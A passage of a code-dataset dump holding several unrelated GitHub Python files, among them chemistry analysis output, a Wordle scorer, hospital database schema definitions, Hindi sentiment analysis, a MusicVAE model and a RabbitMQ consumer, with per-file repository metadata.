'-ifiedt.csv'\n\n if tgt2type == 'dist':\n tgt2dist = self.dist\n oifie = 'frag' + str(tgt1frag) + '-dist' + str(tgt2dist) + '-ifiesum.csv'\n oifiedt = 'frag' + str(tgt1frag) + '-dist' + str(tgt2dist) + '-ifiedt.csv'\n\n if tgt2type == 'dimer-es':\n oifie = 'frag' + str(tgt1frag) + '-dimer-es-false-ifiesum.csv'\n oifiedt = 'frag' + str(tgt1frag) + '-dimer-es-false-ifiedt.csv'\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.ifdf_filters.I = self.ifdf_filters.I.replace(val1, val2)\n self.ifdf_filters.J = self.ifdf_filters.J.replace(val1, val2)\n\n self.ifdfsum.to_csv(path + '/' + oifie)\n self.ifdf_filters.to_csv(path + '/' + oifiedt)\n\n print(path + '/' + oifie)\n print(path + '/' + oifiedt, 'was created.')\n\n if tgt2type in ['molname']:\n\n for j in range(len(self.tgt1frag)):\n tgt1frag = self.tgt1frag[j]\n\n if tgt2type == 'molname':\n tgt2molname = self.tgt2molname\n oifie = 'frag' + str(tgt1frag) + '-' + \\\n str(tgt2molname) + '-dist' + \\\n str(self.dist) + '-ifiesum.csv'\n oifiedt = 'frag' + str(tgt1frag) + \\\n '-' + str(tgt2molname) + '-dist' + \\\n str(self.dist) + '-ifiedt.csv'\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + \\\n str(val1) + ')'\n self.ifdf_filters[j].I = \\\n self.ifdf_filters[j].I.replace(val1, val2)\n self.ifdf_filters[j].J = \\\n self.ifdf_filters[j].J.replace(val1, val2)\n\n self.ifdfsum[j].to_csv(path + '/' + oifie)\n self.ifdf_filters[j].to_csv(path + '/' + oifiedt)\n\n print(path + '/' + oifie)\n print(path + '/' + oifiedt, 'was created.')\n\n if self.anlmode == 'mol':\n if head is None:\n head = os.path.splitext(self.tgtlogs)[0].split('/')[-1]\n\n dist = self.dist\n selecttype = self.selecttype\n # piedamol_mol = self.piedamol_mol\n ifdf_frag_mols = self.ifdf_frag_mols\n ifdfmol_mols = self.ifdfmol_mols\n\n # pieda_frag_mols = self.pieda_frag_mols\n if selecttype == 'molid':\n tgtid = self.tgtmolid\n else:\n tgtid = self.tgt1frag[0]\n\n idstr = str(tgtid[0]) + '-' + str(tgtid[-1])\n ilogdtname = path + '/' + head + '_ifie-fragmol-' + selecttype + \\\n idstr + 'dist' + str(dist) + '.csv'\n imolname = path + '/' + head + '_ifiemol-mol-' + selecttype + \\\n idstr + 'dist' + str(dist) + '.csv'\n isumname = path + '/' + head + '_ifiesummol-mol-' + selecttype + \\\n idstr + 'dist' + str(dist) + '.csv'\n\n# ifdf_frag_molsdt = pd.DataFrame()\n# pd.set_option('display.width', 500)\n# for ifdf_frag_mol in ifdf_frag_mols:\n# ifdf_frag_molsdt = ifdf_frag_molsdt.append(ifdf_frag_mol)\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n ifdf_frag_mols.I = ifdf_frag_mols.I.replace(val1, val2)\n ifdf_frag_mols.J = ifdf_frag_mols.J.replace(val1, val2)\n\n # print(ifdf_frag_molsdt, file=ilogdt)\n ifdf_frag_mols.to_csv(ilogdtname)\n ifdfmol_mols.to_csv(imolname)\n self.ifdfmolsums.to_csv(isumname)\n\n print('---out---')\n print(ilogdtname)\n print(imolname)\n print(isumname)\n\n if self.anlmode == 'fraginmol':\n if head is None:\n head = os.path.splitext(self.tgtlogs)[0].split('/')[-1]\n\n ohead = head + '-' 'tgt1frag' + str(self.tgt1_lofrag) + '-mol' + \\\n str(self.tgt2molname) + 'frag' + str(self.tgt2_lofrag)\n\n if self.addresinfo is True:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.ifdf_filters.I = \\\n self.ifdf_filters.I.replace(val1, val2)\n self.ifdf_filters.J = \\\n self.ifdf_filters.J.replace(val1, val2)\n # self.ifdf.I = self.ifdf.I.replace(val1, val2)\n # self.ifdf.J = self.ifdf.J.replace(val1, val2)\n\n # self.ifdf.to_csv(path + '/' + head + '-ifie.csv')\n oifie = path + '/' + ohead + '-ifie_' + 'dist' + \\\n str(self.dist) + '.csv'\n oifiesum = path + '/' + ohead + '-ifiesum_' + 'dist' + \\\n str(self.dist) + '.csv'\n self.ifdf_filters.to_csv(oifie)\n self.ifdfsums.to_csv(oifiesum)\n print(oifie, 'was generated.')\n print(oifiesum, 'was generated.')\n","repo_name":"kojioku/abmptools","sub_path":"abmptools/anlfmo.py","file_name":"anlfmo.py","file_ext":"py","file_size_in_byte":129991,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"27167588144","text":"import inflect\nfrom nltk.corpus import wordnet\nimport string\n\ndef score_word_by_result_table(word, result_table):\n alpha_count_tracker = dict.fromkeys(string.ascii_lowercase, 0)\n score = 0\n for i in range(0, len(word)):\n score = score + result_table[alpha_count_tracker[word[i].lower()]][word[i].lower()]\n alpha_count_tracker[word[i].lower()] = alpha_count_tracker[word[i].lower()] + 1\n return (score)\n\ndef rank_result_set(words_result_set, method=\"high\"):\n if method == \"low\":\n return ({key: rank for rank, key in enumerate(sorted(words_result_set, key=words_result_set.get), 1)})\n else:\n return (\n {key: rank for rank, key in enumerate(sorted(words_result_set, key=words_result_set.get, reverse=True), 1)})\n\ndef top_result(words_result_set, method=\"high\"):\n return(next(iter(rank_result_set(words_result_set=words_result_set, method=method))))\n\ndef tally_to_prob(tally_table):\n total_letters = 0\n for result in tally_table:\n total_letters = total_letters + sum(result.values())\n\n for i in range(0, 5):\n for k in tally_table[i].keys():\n tally_table[i][k] = tally_table[i][k] / total_letters\n\n return (tally_table)\n\ndef is_noun(word):\n syns = wordnet.synsets(word)\n if syns[0].lexname().split('.')[0] if syns else None == \"noun\":\n return(True)\n else:\n return(False)\n\ndef is_plural(word):\n inf = inflect.engine()\n return(inf.singular_noun(word))\n\nclass Analyzer:\n def __init__(self, words):\n self.words = words\n\n def score_word(self, word, json):\n frequency_perc = json[\"frequency_perc\"] if \"frequency_perc\" in json.keys() else 1\n position_perc = json[\"position_perc\"] if \"position_perc\" in json.keys() else 0\n nonnoun_perc = json[\"nonnoun_perc\"] if \"nonnoun_perc\" in json.keys() else 1\n plural_perc = json[\"plural_perc\"] if \"plural_perc\" in json.keys() else 1\n\n nonnoun_mult = nonnoun_perc if not is_noun(word) else 1\n plural_mult = plural_perc if is_plural(word) else 1\n\n results = (score_word_by_result_table(word=word,\n result_table=tally_to_prob(self.letter_tally_by_frequency())) * frequency_perc + score_word_by_result_table(word=word,\n result_table=tally_to_prob(self.letter_tally_by_position())) * position_perc) * nonnoun_mult * plural_mult\n return(results)\n\n def score_words(self, words, json):\n results = {}\n for word in words:\n results[word] = self.score_word(word=word, json=json)\n return(results)\n\n def letter_tally_by_position(self):\n letters = []\n for i in range(0, 5):\n alpha = dict.fromkeys(string.ascii_lowercase, 0)\n for word in self.words:\n alpha[word[i].lower()] = alpha[word[i].lower()] + 1\n letters.append(alpha)\n return (letters)\n\n def letter_tally_by_frequency(self):\n letter_tally = []\n\n for i in range(0, 5):\n letter_tally.append(dict.fromkeys(string.ascii_lowercase, 0))\n\n for word in self.words:\n alpha_count_tracker = dict.fromkeys(string.ascii_lowercase, 0)\n for i in range(0, len(word)):\n letter_tally[alpha_count_tracker[word[i].lower()]][word[i].lower()] = \\\n letter_tally[alpha_count_tracker[word[i].lower()]][word[i].lower()] + 1\n alpha_count_tracker[word[i].lower()] = alpha_count_tracker[word[i].lower()] + 1\n\n return (letter_tally)","repo_name":"cjordan-personal/wordle_analysis","sub_path":"analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22511106685","text":"from sqlalchemy import Column, String, Integer, DateTime, BigInteger\nfrom sqlalchemy.dialects.postgresql import ARRAY, JSON\n\nfcrb_table_definitions = {\n \"fcrb.serums_ids\": {\n \"id\": Column(\"id\", BigInteger, primary_key=True),\n \"serums_id\": Column(\"serums_id\", Integer),\n \"patnr\": Column(\"patnr\", BigInteger)\n },\n \"fcrb.hospital_doctors\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"serums_id\": Column(\"serums_id\", Integer),\n \"staff_id\": Column(\"staff_id\", Integer),\n \"name\": Column(\"name\", String),\n \"department_id\": Column(\"department_id\", Integer),\n \"department_name\": Column(\"department_name\", String)\n },\n \"fcrb.tags\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"tags\": Column(\"tags\", ARRAY(String))\n },\n \"fcrb.translated_tags\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"tags\": Column(\"tags\", JSON)\n },\n \"fcrb.diagnostic\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"einri\": Column(\"einri\", String(4)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"falnr\": Column(\"falnr\", String(10)),\n \"pernr\": Column(\"pernr\", String(12)),\n \"lfdnr\": Column(\"lfdnr\", String(3)),\n \"dkey1\": Column(\"dkey1\", String(30))\n },\n \"fcrb.episode\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"falnr\": Column(\"falnr\", String(10)),\n \"pernr\": Column(\"pernr\", String(12)),\n \"einri\": Column(\"einri\", String(4)),\n \"falar\": Column(\"falar\", String(1)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"bekat\": Column(\"bekat\", String(40)),\n \"einzg\": Column(\"einzg\", String(9)),\n \"statu\": Column(\"statu\", String(1)),\n \"krzan\": Column(\"krzan\", String(1)),\n \"enddt\": Column(\"enddt\", DateTime(timezone=False)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"storn\": Column(\"storn\", String(1)),\n \"begdt\": Column(\"begdt\", DateTime(timezone=False)),\n \"casetx\": Column(\"casetx\", String(20)),\n \"fatxt\": Column(\"fatxt\", String(40)),\n \"enddtx\": Column(\"enddtx\", String(20))\n },\n \"fcrb.medical_specialty\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"orgid\": Column(\"orgid\", String(8)),\n \"orgna\": Column(\"orgna\", String(40))\n },\n \"fcrb.medication\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"einri\": Column(\"einri\", String(4)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"falnr\": Column(\"falnr\", String(10)),\n \"motx\": Column(\"motx\", String(60)),\n \"mostx\": Column(\"mostx\", String(80)),\n \"mpresnr\": Column(\"mpresnr\", String(10)),\n \"motypid\": Column(\"motypid\", String(2)),\n \"pernr\": Column(\"pernr\", String(10)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"storn\": Column(\"storn\", String(1)),\n \"stusr\": Column(\"stusr\", String(10)),\n \"stdat\": Column(\"stdat\", DateTime(timezone=False)),\n \"stoid\": Column(\"stoid\", String(15))\n },\n \"fcrb.monitoring_params\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"falnr\": Column(\"falnr\", String(10)),\n \"vppid\": Column(\"vppid\", String(15)),\n \"pernr\": Column(\"pernr\", String(10)),\n \"vbem\": Column(\"vbem\", String(150)),\n \"datyp\": Column(\"datyp\", DateTime(timezone=False)),\n \"wertogr\": Column(\"wertogr\", String(20)),\n \"wertugr\": Column(\"wertugr\", String(20)),\n \"wertmax\": Column(\"wertmax\", String(20)),\n \"wertmin\": Column(\"wertmin\", String(20))\n },\n \"fcrb.order_entry\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"idodr\": Column(\"idodr\", String(10)),\n \"einri\": Column(\"einri\", String(10)),\n \"falnr\": Column(\"falnr\", String(10)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"pernr\": Column(\"pernr\", String(12)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"orgid\": Column(\"orgid\", String(8))\n },\n \"fcrb.patient_address\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"pstlz\": Column(\"pstlz\", String(10)),\n \"stras\": Column(\"stras\", String(50)),\n \"land\": Column(\"land\", String(15)),\n \"ort\": Column(\"ort\", String(20)),\n \"deck\": Column(\"deck\", String(15)),\n \"adrnr\": Column(\"adrnr\", String(5))\n },\n \"fcrb.patient\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"gschl\": Column(\"gschl\", String(1)),\n \"nname\": Column(\"nname\", String(30)),\n \"vname\": Column(\"vname\", String(30)),\n \"gbdat\": Column(\"gbdat\", DateTime(timezone=False)),\n \"gbnam\": Column(\"gbnam\", String(30)),\n \"namzu\": Column(\"namzu\", String(5)),\n \"glrand\": Column(\"glrand\", String(20)),\n \"famst\": Column(\"famst\", String(10)),\n \"telf1\": Column(\"telf1\", String(15)),\n \"rvnum\": Column(\"rvnum\", String(20))\n },\n \"fcrb.professional\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"pernr\": Column(\"pernr\", String(10)),\n \"erusr\": Column(\"erusr\", String(12)),\n \"orgid\": Column(\"orgid\", String(8)),\n \"gbdat\": Column(\"gbdat\", DateTime(timezone=False)),\n \"begdt\": Column(\"begdt\", DateTime(timezone=False)),\n \"enddt\": Column(\"enddt\", DateTime(timezone=False)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"rank\": Column(\"rank\", String(3))\n },\n \"fcrb.vital_signs\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"idvs\": Column(\"idvs\", String(10)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"falnr\": Column(\"falnr\", String(10)),\n \"vppid\": Column(\"vppid\", String(15)),\n \"dttyp\": Column(\"dttyp\", String(10)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"typevs\": Column(\"typevs\", String(9)),\n \"vwert\": Column(\"vwert\", String(7)),\n \"vbem\": Column(\"vbem\", String(150))\n }\n}","repo_name":"SkinnyPigeon/new_dv_tests","sub_path":"refactored/tables/fcrb_table_definitions.py","file_name":"fcrb_table_definitions.py","file_ext":"py","file_size_in_byte":6096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43567907516","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport pandas as pd\nimport codecs\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.metrics.classification import accuracy_score\nfrom sklearn.metrics import f1_score\n\n\n# In[4]:\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[5]:\n\n\ndata = pd.read_csv(\"HindiSentiWordnet.txt\", delimiter=' ')\n\nfields = ['POS_TAG', 'ID', 'POS', 'NEG', 'LIST_OF_WORDS']\ndf = data.head()\ndf\n\n\n# In[6]:\n\n\nwords_dict = {}\nfor i in data.index:\n print (data[fields[0]][i], data[fields[1]][i], data[fields[2]][i], data[fields[3]][i], data[fields[4]][i])\n\n words = data[fields[4]][i].split(',')\n for word in words:\n words_dict[word] = (data[fields[0]][i], data[fields[2]][i], data[fields[3]][i])\n\n\n# In[7]:\n\n\ndef sentiment(text):\n words = word_tokenize(text)\n votes = []\n pos_polarity = 0\n neg_polarity = 0\n \n allowed_words = ['a','v','r','n']\n for word in words:\n if word in words_dict:\n \n pos_tag, pos, neg = words_dict[word]\n #print(word, pos_tag, pos, neg)\n \n if pos_tag in allowed_words:\n if pos > neg:\n pos_polarity += pos\n votes.append(1)\n elif neg > pos:\n neg_polarity += neg\n votes.append(0)\n\n pos_votes = votes.count(1)\n neg_votes = votes.count(0)\n if pos_votes > neg_votes:\n return 1\n elif neg_votes > pos_votes:\n return 0\n else:\n if pos_polarity < neg_polarity:\n return 0\n else:\n return 1\n \n\n\n# In[12]:\n\n\npred_y = []\nactual_y = []\n\npos_reviews = codecs.open(\"pos_hindi.txt\", \"r\", encoding='utf-8', errors='ignore').read()\nfor line in pos_reviews.split('$'):\n data = line.strip('\\n')\n if data:\n pred_y.append(sentiment(data))\n actual_y.append(1)\n\nprint(len(actual_y))\nneg_reviews = codecs.open(\"neg_hindi.txt\", \"r\", encoding='utf-8', errors='ignore').read()\nfor line in neg_reviews.split('$'):\n data=line.strip('\\n')\n if data:\n pred_y.append(sentiment(data))\n actual_y.append(0)\nprint(len(actual_y))\nprint(\"Accuracy=\", accuracy_score(actual_y, pred_y) * 100)\nprint('F-measure: ',f1_score(actual_y,pred_y))\n\n\nif __name__ == '__main__':\n sentiment1=sentiment(\" फिल्म की कास्टिंग जबरदस्त है\")\n if sentiment1==1:\n print(\"Sentiment is positive\")\n else:\n print(\"Sentiment is negative\")\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"imrs29/Hindi-News-text-summarization-and-sentiment-analysis-using-natural-language-processing","sub_path":"Sentiment.py","file_name":"Sentiment.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41356853943","text":"#!/usr/bin/env python\nimport rospy\nfrom ci_tools.simulation_control import SimulationControl\nfrom ci_tools.helpers.ci_log import CiLog\n\n\nclass HectorSimulationControl(SimulationControl):\n \"\"\"Class for controlling the simulation with Hector Tracker setup.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize variables, then start sim with behavior.\"\"\"\n super(HectorSimulationControl, self).__init__()\n self._mission_behavior = \"\"\n\n self.read_ros_additional_ros_params()\n self.import_finalizers()\n\n self.start_sim()\n self.start_behavior(self._mission_behavior)\n CiLog.info(\"Initialization finished. Starting timer\")\n self.start_simulation_timer()\n\n\n\n def read_ros_additional_ros_params(self):\n \"\"\"Reads additional ROS parameters that are not considered by SimulationControl.read_ros_additional_ros_params().\"\"\"\n mission_behavior_full_param_name = rospy.search_param('mission_behavior')\n self._mission_behavior = str(rospy.get_param(mission_behavior_full_param_name))\n","repo_name":"tu-darmstadt-ros-pkg/hector_ci_tools","sub_path":"src/hector_ci_tools/hector_simulation_control.py","file_name":"hector_simulation_control.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14343222882","text":"from PIL import Image\r\n \r\nim1 = Image.open('451116c6-17a8-452a-b7b8-ebff1b6a2bed.jfif')\r\ndef comand_type(string, flag,tag):\r\n\r\n tof=0 # tof=true or false\r\n i=0\r\n while i < len(tag):\r\n c=0\r\n while c < len(tag[i]):\r\n if str(tag[i][c]) in string:\r\n tof=1\r\n break\r\n else: c+=1\r\n if tof == 1: break\r\n else :i+=1\r\n if tof == 0: rezult= \"no\"\r\n else: rezult=flag[i]\r\n\r\n return rezult\r\n","repo_name":"Cergol/voice_assistant","sub_path":"helper/calcul.py","file_name":"calcul.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22526348647","text":"'''\nFunction to determine if a substring k exists in a string s.\nIf k exists in s, return the index of the char in s that k starts.\nIf k doesn't exist inside of s, return -1. \nNote: implement from scratch, cannot use built in substring function.\n'''\nimport time\nclass Solution:\n # O(len(s)) time, O(1) space\n def substr(self, s, k):\n i = 0; j = 0\n m = False # stores whether there was a previous match\n while i < len(s) and j < len(k):\n if s[i] == k[j]:\n j += 1\n m = True\n else:\n if m:\n j = 0\n i -= 1\n m = False\n i += 1\n \n if j >= len(k):\n return i-len(k)\n return -1\n \n def test1(self):\n s = \"hellothere\"\n k = \"other\"\n res = self.substr(s, k)\n print(\"res: \", res)\n\n def test2(self):\n s = \"hellothere\"\n k = \"hella\"\n res = self.substr(s, k)\n print(\"res: \", res)\n\ns = Solution()\ns.test1()\n#s.test2()\n \n\n \n","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/substring.py","file_name":"substring.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42867006982","text":"import abc\n\nfrom magenta.contrib import training as contrib_training\nimport tensorflow.compat.v1 as tf\nimport tensorflow_probability as tfp\nimport tf_slim\n\nds = tfp.distributions\n\n\nclass BaseEncoder(object, metaclass=abc.ABCMeta):\n\n @property\n @abc.abstractmethod\n def output_depth(self):\n pass\n\n @abc.abstractmethod\n def build(self, hparams, is_training=True):\n pass\n\n @abc.abstractmethod\n def encode(self, sequence, sequence_length):\n pass\n\n\nclass BaseDecoder(object, metaclass=abc.ABCMeta):\n\n @abc.abstractmethod\n def build(self, hparams, output_depth, is_training=True):\n pass\n\n @abc.abstractmethod\n def reconstruction_loss(self, x_input, x_target, x_length, z=None, c_input=None):\n pass\n\n @abc.abstractmethod\n def sample(self, n, max_length=None, z=None, c_input=None):\n pass\n\n\nclass MusicVAE(object):\n\n def __init__(self, encoder, decoder):\n self._encoder = encoder\n self._decoder = decoder\n\n def build(self, hparams, output_depth, is_training):\n tf.logging.info('Building MusicVAE model with %s, %s, and hparams:\\n%s',\n self.encoder.__class__.__name__,\n self.decoder.__class__.__name__, hparams.values())\n self.global_step = tf.train.get_or_create_global_step()\n self._hparams = hparams\n self._encoder.build(hparams, is_training)\n self._decoder.build(hparams, output_depth, is_training)\n\n @property\n def encoder(self):\n return self._encoder\n\n @property\n def decoder(self):\n return self._decoder\n\n @property\n def hparams(self):\n return self._hparams\n\n def encode(self, sequence, sequence_length, control_sequence=None):\n \"\"\"인코더가 입력 데이터를 입력받아 mu와 sigma를 계산하는 함수\"\"\"\n hparams = self.hparams\n z_size = hparams.z_size\n\n sequence = tf.to_float(sequence)\n if control_sequence is not None:\n control_sequence = tf.to_float(control_sequence)\n sequence = tf.concat([sequence, control_sequence], axis=-1)\n encoder_output = self.encoder.encode(sequence, sequence_length)\n\n mu = tf.layers.dense(\n encoder_output,\n z_size,\n name='encoder/mu',\n kernel_initializer=tf.random_normal_initializer(stddev=0.001))\n sigma = tf.layers.dense(\n encoder_output,\n z_size,\n activation=tf.nn.softplus,\n name='encoder/sigma',\n kernel_initializer=tf.random_normal_initializer(stddev=0.001))\n\n return ds.MultivariateNormalDiag(loc=mu, scale_diag=sigma)\n\n def _compute_model_loss(self, input_sequence, output_sequence, sequence_length, control_sequence):\n \"\"\"forward 후 loss 계산\"\"\"\n hparams = self.hparams\n batch_size = hparams.batch_size\n\n input_sequence = tf.to_float(input_sequence)\n output_sequence = tf.to_float(output_sequence)\n\n max_seq_len = tf.minimum(tf.shape(output_sequence)[1], hparams.max_seq_len)\n input_sequence = input_sequence[:, :max_seq_len]\n\n if control_sequence is not None:\n control_depth = control_sequence.shape[-1]\n control_sequence = tf.to_float(control_sequence)\n control_sequence = control_sequence[:, :max_seq_len]\n control_sequence.set_shape([batch_size, None, control_depth])\n\n # decoder input, target 전처리\n x_target = output_sequence[:, :max_seq_len]\n x_input = tf.pad(output_sequence[:, :max_seq_len - 1], [(0, 0), (1, 0), (0, 0)])\n x_length = tf.minimum(sequence_length, max_seq_len)\n\n\n if hparams.z_size:\n # latent vector 추출\n q_z = self.encode(input_sequence, x_length, control_sequence)\n z = q_z.sample() # \n\n # 사전분포 p(z)\n p_z = ds.MultivariateNormalDiag(loc=[0.] * hparams.z_size, scale_diag=[1.] * hparams.z_size)\n\n # regularization term in ELBO \n kl_div = ds.kl_divergence(q_z, p_z)\n\n\n else:\n kl_div = tf.zeros([batch_size, 1], dtype=tf.float32)\n z = None\n\n # decoder forward 및 loss 계산\n # reconstruction term in ELBO\n r_loss, metric_map = self.decoder.reconstruction_loss(x_input, x_target, x_length, z, control_sequence)[0:2]\n\n # free bits in Eq.4\n # threshold 이상인 경우만 kl_loss 적용\n free_nats = hparams.free_bits * tf.math.log(2.0)\n kl_cost = tf.maximum(kl_div - free_nats, 0)\n\n # beta-VAE in Eq.3\n # beta(beta < 1)를 곱함으로써 kl_loss 비중 감소\n beta = ((1.0 - tf.pow(hparams.beta_rate, tf.to_float(self.global_step))) * hparams.max_beta)\n self.loss = tf.reduce_mean(r_loss) + beta * tf.reduce_mean(kl_cost)\n\n scalars_to_summarize = {\n 'loss': self.loss,\n 'losses/r_loss': r_loss,\n 'losses/kl_loss': kl_cost,\n 'losses/kl_bits': kl_div / tf.math.log(2.0),\n 'losses/kl_beta': beta,\n }\n return metric_map, scalars_to_summarize\n\n\n def train(self, input_sequence, output_sequence, sequence_length, control_sequence=None):\n _, scalars_to_summarize = self._compute_model_loss(input_sequence, output_sequence, sequence_length, control_sequence)\n\n hparams = self.hparams\n lr = ((hparams.learning_rate - hparams.min_learning_rate) *\n tf.pow(hparams.decay_rate, tf.to_float(self.global_step)) +\n hparams.min_learning_rate)\n\n optimizer = tf.train.AdamOptimizer(lr)\n\n tf.summary.scalar('learning_rate', lr)\n for n, t in scalars_to_summarize.items():\n tf.summary.scalar(n, tf.reduce_mean(t))\n\n return optimizer\n\n\n def eval(self, input_sequence, output_sequence, sequence_length, control_sequence=None):\n metric_map, scalars_to_summarize = self._compute_model_loss(input_sequence, output_sequence, sequence_length, control_sequence)\n\n for n, t in scalars_to_summarize.items():\n metric_map[n] = tf.metrics.mean(t)\n\n metrics_to_values, metrics_to_updates = (\n tf_slim.metrics.aggregate_metric_map(metric_map))\n\n for metric_name, metric_value in metrics_to_values.items():\n tf.summary.scalar(metric_name, metric_value)\n\n return list(metrics_to_updates.values())\n\n\n def sample(self, n, max_length=None, z=None, c_input=None, **kwargs):\n if z is not None and int(z.shape[0]) != n:\n raise ValueError(\n '`z` must have a first dimension that equals `n` when given. '\n 'Got: %d vs %d' % (z.shape[0], n))\n\n if self.hparams.z_size and z is None:\n tf.logging.warning('Sampling from conditional model without `z`. Using random `z`.')\n normal_shape = [n, self.hparams.z_size]\n normal_dist = tfp.distributions.Normal(\n loc=tf.zeros(normal_shape), scale=tf.ones(normal_shape))\n z = normal_dist.sample()\n\n return self.decoder.sample(n, max_length, z, c_input, **kwargs)\n\n\ndef get_default_hparams():\n return contrib_training.HParams(\n max_seq_len=32, # Maximum sequence length. Others will be truncated.\n z_size=32, # Size of latent vector z.\n free_bits=0.0, # Bits to exclude from KL loss per dimension.\n max_beta=1.0, # Maximum KL cost weight, or cost if not annealing.\n beta_rate=0.0, # Exponential rate at which to anneal KL cost.\n batch_size=512, # Minibatch size.\n grad_clip=1.0, # Gradient clipping. Recommend leaving at 1.0.\n clip_mode='global_norm', # value or global_norm.\n grad_norm_clip_to_zero=10000,\n learning_rate=0.001, # Learning rate.\n decay_rate=0.9999, # Learning rate decay per minibatch.\n min_learning_rate=0.00001, # Minimum learning rate.\n )\n","repo_name":"yongsun-yoon/music-vae","sub_path":"base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":7933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18292904660","text":"import pika, time, json\nfrom dotenv import dotenv_values\nfrom pymongo import MongoClient\n\nconfig = dotenv_values(\".env\")\nclient = MongoClient(config['MONGODB_ENDPOINT'],\n username=config['MONGODB_USERNAME'],\n password=config['MONGODB_PASSWORD'])\ndb = client.tododb\n\ndef queue_process_function(msg):\n #print(\" processing\")\n print(\" [x] Received \" + str(msg))\n\n data_string = msg.decode(\"utf-8\")\n data_string_json = data_string.replace(\"'\", \"\\\"\")\n data = json.loads(data_string_json)\n #print(data)\n\n post_id = db.payments.insert_one(data).inserted_id\n #print()\n\n #time.sleep(5) # delays for 5 seconds\n print(\"processing finished \" + post_id);\n return;\n\n# Access the CLODUAMQP_URL environment variable and parse it (fallback to localhost)\nqueue_endpoint = config['AMQP_URL']\nparams = pika.URLParameters(queue_endpoint)\nconnection = pika.BlockingConnection(params)\nchannel = connection.channel() # start a channel\nchannel.queue_declare(queue=config['QUEUE_WORKLOAD']) # Declare a queue\n\n# create a function which is called on incoming messages\ndef callback(ch, method, properties, body):\n queue_process_function(body)\n\n# set up subscription on the queue\nchannel.basic_consume(config['QUEUE_WORKLOAD'],\n callback,\n auto_ack=True)\n\n# start consuming (blocks)\nchannel.start_consuming()\nconnection.close()\n","repo_name":"fase-5-grupo-h/challenge-sap-cienci","sub_path":"consumer/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41025588941","text":"import random\r\n\r\nnumber = [1,2,3,4,5,6]\r\ndef dice():\r\n while True:\r\n computer = random.choice(number)\r\n print('주사위를 굴리세요. ', computer)\r\n click = input('다시 굴리시겠습니까? ')\r\n if click == 'yes':\r\n continue\r\n elif click == 'no':\r\n print('수고하셨습니다.')\r\n break\r\ndice()\r\n","repo_name":"seyeonyy/project_python","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74750397866","text":"def strong(n):\n add=0\n while n!=0:\n rem=n%10\n fact=1\n for i in range(1,rem+1):\n fact*=i\n add+=fact\n n//=10\n return add\nn=145\nif n==strong(n):\n print('strong ')\nelse:\n print('not strong')\n\n\ndef fact(n):\n fact=1\n for i in range(1,n+1):\n fact*=i\n return fact\n\ndef strong(n,c):\n add=0\n while n!=0:\n rem=n%10\n add+=fact(rem)\n n//=10\n return 